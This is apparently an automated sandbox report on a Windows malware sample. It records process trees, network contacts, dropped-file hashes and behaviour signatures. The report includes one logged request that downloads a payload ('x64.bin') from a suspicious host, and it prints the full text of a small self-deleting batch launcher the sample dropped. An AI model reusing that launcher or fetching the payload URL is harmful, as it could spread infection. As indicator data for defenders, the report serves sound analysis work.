Full Path: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Command Line: "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
svchost.exe, PID: 2092, Parent PID: 948
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.202.161.73 [VT] United States
N 192.42.116.41 [VT] Netherlands
N 192.229.232.240 [VT] United States
N 185.85.0.29 [VT] Germany

TCP

Source Source Port Destination Destination Port
192.168.35.21 49176 185.85.0.29 www.php.net 80
192.168.35.21 49177 185.85.0.29 www.php.net 443
192.168.35.21 49199 185.85.0.29 www.php.net 80
192.168.35.21 49201 185.85.0.29 www.php.net 443
192.168.35.21 49182 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.21 49204 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.21 49200 192.42.116.41 groupcreatedt.at 80
192.168.35.21 49188 23.202.161.73 www.microsoft.com 80
192.168.35.21 49189 23.202.161.73 www.microsoft.com 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.php.net [VT] A 185.85.0.29 [VT]
CNAME www-php-net.ax4z.com [VT]
www.download.windowsupdate.com [VT] CNAME cs12.wpc.v0cdn.net [VT]
A 192.229.232.240 [VT]
CNAME 2-01-3cf7-0009.cdx.cedexis.net [VT]
CNAME wu.ec.azureedge.net [VT]
CNAME wu.wpc.apr-52dd2.edgecastdns.net [VT]
CNAME wu.azureedge.net [VT]
www.microsoft.com [VT] CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net [VT]
CNAME e13678.dspb.akamaiedge.net [VT]
CNAME www.microsoft.com-c-3.edgekey.net [VT]
A 23.202.161.73 [VT]
groupcreatedt.at [VT] A 192.42.116.41 [VT]

HTTP Requests

URI Data
http://www.php.net/license/3_0.txt
GET /license/3_0.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: www.php.net

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86403
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 19 Apr 2017 22:43:31 GMT
If-None-Match: "80ab755e5eb9d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 26 Feb 2020 21:39:14 GMT
If-None-Match: "06d5b30edecd51:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://groupcreatedt.at/key/x64.bin
GET /key/x64.bin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: groupcreatedt.at

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.35.21 8.8.8.8 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.35.21 49177 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
192.168.35.21 49201 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
File Size 322048 bytes
File Type raw G3 data, byte-padded
MD5 0df2d1c29bfee269b458a7ff8364f79f
SHA1 767a97336567afc966588a68aa161f4df29157ec
SHA256 db311c2cdda01c83e73585784a33c17d67a595110d860db83946a6c08113e348
CRC32 B78DED38
Ssdeep 6144:MoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:5TH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara
  • embedded_win_api - A non-Windows executable contains win32 API functions names
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name BF2.bat
Associated Filenames
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat
File Size 110 bytes
File Type ASCII text, with CRLF line terminators
MD5 bd7e0319d3c5162a8e1423cdcbc2d451
SHA1 fe24404fc44d6fbedd151532833d225c4dd960fa
SHA256 e051145812e9fbb30ad592762355ef5e7ba11c0ee3e2afa2800d03ac5d37fa21
CRC32 7EC95280
Ssdeep 3:Z8DTc6OWRNfeViIjgU64vHXMJATkUER8DTQDlALwn:Z8rRy9vvHXMJ2do8oDlkwn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file Display Text
:34303266
if not exist %1 goto 4260664029
cmd /C "%1 %2"
if errorlevel 1 goto 34303266
:4260664029
del %0
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Cab9694.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Cab9694.tmp
C:\Users\user\AppData\Local\Temp\Cab9713.tmp
File Size 52608 bytes
File Type Microsoft Cabinet archive data, 52608 bytes, 1 file
MD5 ff9672cd98bf5d41722d2d1207344c67
SHA1 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
CRC32 2CA25202
Ssdeep 1536:hnbq9Gl2ifWyUQeydcYDAdN6CtfC8KAZc3kJTiD:hnbq9GQQW7NYDZCw5AZc3r
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Tar96A5.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar96A5.tmp
C:\Users\user\AppData\Local\Temp\Tar9714.tmp
File Size 125286 bytes
File Type data
MD5 8237156ad13c2cd7c5cc2faa6969fd86
SHA1 e5481457795650900ee04db955c87224e2db32f0
SHA256 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
CRC32 9C009AE7
Ssdeep 1536:oFAWrmqK1EYqbyr0CpXU4SwucWzvVPIM/P/CGv:oBK1LrVXPEcWOMP/D
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab9F5F.tmp
C:\Users\user\AppData\Local\Temp\CabAD55.tmp
C:\Users\user\AppData\Local\Temp\CabAF5A.tmp
C:\Users\user\AppData\Local\Temp\CabC4E4.tmp
C:\Users\user\AppData\Local\Temp\CabCAEF.tmp
C:\Users\user\AppData\Local\Temp\CabCB3F.tmp
C:\Users\user\AppData\Local\Temp\CabCCA8.tmp
File Size 57121 bytes
File Type Microsoft Cabinet archive data, 57121 bytes, 1 file
MD5 0ec1dc356bbe2c2cb76e83e51e54c290
SHA1 49b409e5df72dd6d43d6cff0940dcd7a0e9bf576
SHA256 47c69130af70998da627189acc578c2081ebc235eeb4c2c4fcd55e7126a13890
CRC32 E7C735A0
Ssdeep 1536:9ieuRGIYY2/h2OAdzzTP4Mq/HI8/E0IYeDFR3XaWs4:9eBV25Kzzr4zfIl0EDaH4
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 2286e5c733a0bec9fbbd5451d3d7f3cb
SHA1 8d252158dfeb523232ce296446d30c300587c226
SHA256 426d9e5ab1ce26e1ef12b8661f1ea6853181e81dd9e24561cb0d08aa882aef20
CRC32 F78D3CD4
Ssdeep 6:kKsxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:0xWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 5c80f5796e6a6f93c0a9860ae71773ef
SHA1 6724630912ded4068fdbf58f509ad3ff846f7782
SHA256 ab9a13ac77819176a3ade46e561a66fd09245f563ea90bed00357c74cb67c760
CRC32 2412C20D
Ssdeep 6:kKD81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:70pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name Tar9F60.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar9F60.tmp
C:\Users\user\AppData\Local\Temp\TarAD56.tmp
C:\Users\user\AppData\Local\Temp\TarAF5B.tmp
C:\Users\user\AppData\Local\Temp\TarC4E5.tmp
C:\Users\user\AppData\Local\Temp\TarCAF0.tmp
C:\Users\user\AppData\Local\Temp\TarCB40.tmp
C:\Users\user\AppData\Local\Temp\TarCCA9.tmp
File Size 144697 bytes
File Type data
MD5 c1dcbe728573780e2494bdad85364640
SHA1 4eb346a0ef16a5d82921369fb923134afdb6c2ce
SHA256 c308a174d279757b662c990a77b081af05cb4d7587d7e529764dd74013d62106
CRC32 7E692B86
Ssdeep 1536:w860v3gAurbFCLxR09oLRYpHdT20LrVY/jKQu8OXflvu:wvauuxR0aRYlEjKn8ofRu
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 1521 bytes
File Type data
MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
CRC32 53112384
Ssdeep 24:f5DuDD02FDuDD0xlGUCpMTlAXLOhT/g+vVp5cVQyPE5LTl79lazjY:hDuDD02FDuDD0xwUCylA7P+vVmQ6gR73
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 242 bytes
File Type data
MD5 246e9a31b6d3790e61449f9bdc5a1452
SHA1 1804daff77dadf6d9a39d32b6d4a81b03a2464aa
SHA256 74b6e3fcf7f33ed0ce21e4662cae19f6286571d32d9a9bff4b7252a292e8d33a
CRC32 A86D53AF
Ssdeep 3:kkFkldv31fllXlE/wJlllH1jdClRRly+MlMJA3++oWctQQlvSGKlNLOl5ln:kKMv33/lHLB7WJAOXWcaQnK+7
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 9719fdc603d356f429f9334316aedc21
SHA1 0692e90d506fb6b3bc0d3ba60bfb27dddddac9a4
SHA256 7f95a1cae360334bf3e36a1411937e1f296ca3c9a5b58c6fd817f5206c051906
CRC32 FE8C46E8
Ssdeep 6:kKzQC81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:7f0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 4433b3e948f41f445d17d4ac3351fbba
SHA1 4578ea27748be04131b7f7108db799e71ff10603
SHA256 293e58579d8653f3d332593a350cbfb5114da05aef7005a733bdd02dd83d238e
CRC32 A64E96BD
Ssdeep 6:kKJy81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:hy0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 663a42297b75e4caf22e990e774dccaf
SHA1 2ad90630ff6e936cb61a18bc387c2c7000fc4d72
SHA256 a73aacc142a6c29890a1c93ad8a8dc8c2d0562f25219673ac92c3b9471a5c3fc
CRC32 759F0533
Ssdeep 6:kKTf81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:b0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Submit file
Sorry! No CAPE files.
Process Name ErfkBwzLz2p.exe
PID 920
Dump Size 33280 bytes
Module Path C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
Type PE image: 32-bit executable
MD5 2fe7ff0489f6762c180938ed457b273e
SHA1 3515979d3cc1dbd7128ba8b96ecdd9a6b1a6393f
SHA256 863f941fa7c19cbcf65a92e833e556d21ffa7e0e752d401d4c31049dcbafc5d9
CRC32 EF94C133
Ssdeep 768:wxxjTRHBig+dgoYwlGqr1JnYd4it97iAa5:wxxT5gdTpGqr7n44y9Ja
ClamAV None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Dump Filename 863f941fa7c19cbcf65a92e833e556d21ffa7e0e752d401d4c31049dcbafc5d9
Process Name corrawex.exe
PID 948
Dump Size 33280 bytes
Module Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Type PE image: 32-bit executable
MD5 64375492aa030edd44b23ac384704074
SHA1 d6dc4deb85990aa4fc0e919f27ded981f6acff18
SHA256 3cb842224c48f8196ed582c17b6176f08f715a36e3af6975c621ddc9198b047a
CRC32 575B1AF1
Ssdeep 768:wxxjTRHBig+dgoYwlGqr1JnYd4it97iAa5:wxxT5gdTpGqr7n44y9Ja
ClamAV None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Dump Filename 3cb842224c48f8196ed582c17b6176f08f715a36e3af6975c621ddc9198b047a
Process Name cmd.exe
PID 2576
Dump Size 295424 bytes
Module Path C:\Windows\SysWOW64\cmd.exe
Type PE image: 32-bit executable
MD5 c88b27358189180e28732c99c750e8c2
SHA1 3731418934f3aa6b4b34d379d5de49fcc77ce8f9
SHA256 d90e4b30408869ca39998ae5f24fa3f8c7fb80993704c9c27d6af55706ed65f5
CRC32 9D9A812C
Ssdeep 3072:6GxrhzdACGfHB8i+1n9KhpD0jZ7NzUv0f/yskwjyGe:7xrhhACyh85n8hmRNz/yskwm
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename d90e4b30408869ca39998ae5f24fa3f8c7fb80993704c9c27d6af55706ed65f5
Process Name cmd.exe
PID 332
Dump Size 295424 bytes
Module Path C:\Windows\SysWOW64\cmd.exe
Type PE image: 32-bit executable
MD5 76c146343506f4a2f7fdf9a9b147f2be
SHA1 c0ec38001d3b9c62024154d17c9ab8962a6c3546
SHA256 3585d6791f14bbde95fbb021ffcf72d35780e8457fbca9a57f799c28b9923359
CRC32 12A40BF0
Ssdeep 3072:6GxrhzdACGfHB8i+1n9KhpD0jZ7NzUv0f/yskNjyGe:7xrhhACyh85n8hmRNz/yskNm
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 3585d6791f14bbde95fbb021ffcf72d35780e8457fbca9a57f799c28b9923359
Process Name svchost.exe
PID 2092
Dump Size 26112 bytes
Module Path C:\Windows\sysnative\svchost.exe
Type PE image: 64-bit executable
MD5 7003a74e563677e46ceb5b36092cd6b9
SHA1 63cfdd1cfaad6dfe24e9e302a0ea892a295346ed
SHA256 ddcec42be56dc0afbc17ebab3eee2ecf190d7cb0ef1de009d909c75afe8ed1dd
CRC32 9BD4E242
Ssdeep 384:OZvvWkXZVq+1t5TYGaVeAYMq1n+Rfk4ue//wCE/lWPWSsEsj45RCOvojHPKW9C56:uWkX7q+f5TYvVeZMmn+0C4x/EbvKHPK
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename ddcec42be56dc0afbc17ebab3eee2ecf190d7cb0ef1de009d909c75afe8ed1dd
Process Name explorer.exe
PID 1632
Dump Size 2861568 bytes
Module Path C:\Windows\explorer.exe
Type PE image: 64-bit executable
MD5 3330eed0cd0b6829222ee260e58aeb56
SHA1 9bdcd9f4938664d9afeecfbb183ead620bfa0570
SHA256 33caeebcf72fb8085b3856463965f07f3ed5fd99ca08c2a50a3559d9c8347b63
CRC32 5C891D3C
Ssdeep 49152:kxrceI/lIRYraisQhFCUHlvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:GrcPlIWvvYYYYYYYYYYYRYYYYYYYYYY4
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 33caeebcf72fb8085b3856463965f07f3ed5fd99ca08c2a50a3559d9c8347b63

Comments



No comments posted

Processing ( 7.991 seconds )

  • 3.055 CAPE
  • 2.202 ProcDump
  • 1.434 BehaviorAnalysis
  • 0.62 Dropped
  • 0.229 TargetInfo
  • 0.225 Static
  • 0.092 TrID
  • 0.058 Deduplicate
  • 0.051 NetworkAnalysis
  • 0.019 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.688 seconds )

  • 0.141 antidbg_windows
  • 0.047 decoy_document
  • 0.045 api_spamming
  • 0.044 NewtWire Behavior
  • 0.029 Doppelganging
  • 0.029 antiav_detectreg
  • 0.026 injection_createremotethread
  • 0.024 InjectionCreateRemoteThread
  • 0.017 InjectionInterProcess
  • 0.016 injection_runpe
  • 0.016 InjectionProcessHollowing
  • 0.012 injection_explorer
  • 0.012 antivm_generic_disk
  • 0.011 infostealer_ftp
  • 0.01 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 ransomware_files
  • 0.009 bootkit
  • 0.008 antiemu_wine_func
  • 0.008 antivm_vbox_window
  • 0.008 dynamic_function_loading
  • 0.007 malicious_dynamic_function_loading
  • 0.007 stealth_file
  • 0.007 reads_self
  • 0.007 virus
  • 0.007 infostealer_im
  • 0.006 antivm_generic_services
  • 0.006 infostealer_browser_password
  • 0.006 antisandbox_script_timer
  • 0.006 kovter_behavior
  • 0.006 antianalysis_detectreg
  • 0.005 hancitor_behavior
  • 0.005 antiav_detectfile
  • 0.005 infostealer_mail
  • 0.005 ransomware_extensions
  • 0.004 exploit_getbasekerneladdress
  • 0.003 recon_programs
  • 0.003 exploit_gethaldispatchtable
  • 0.003 persistence_autorun
  • 0.003 antivm_vbox_keys
  • 0.003 infostealer_bitcoin
  • 0.002 lsass_credential_dumping
  • 0.002 antivm_vbox_libs
  • 0.002 antidebug_guardpages
  • 0.002 infostealer_browser
  • 0.002 EvilGrab
  • 0.002 h1n1_behavior
  • 0.002 shifu_behavior
  • 0.002 stealth_timeout
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 masquerade_process_name
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 stack_pivot
  • 0.001 Vidar Behavior
  • 0.001 betabot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 ipc_namedpipe
  • 0.001 kibex_behavior
  • 0.001 exec_crash
  • 0.001 Raccoon Behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 recon_fingerprint

Reporting ( 0.042 seconds )

  • 0.028 SubmitCAPE
  • 0.014 CompressResults
Task ID 131467
Mongo ID 5e79d7150986a12c9f6d5e7b
Cuckoo release 1.3-CAPE
Delete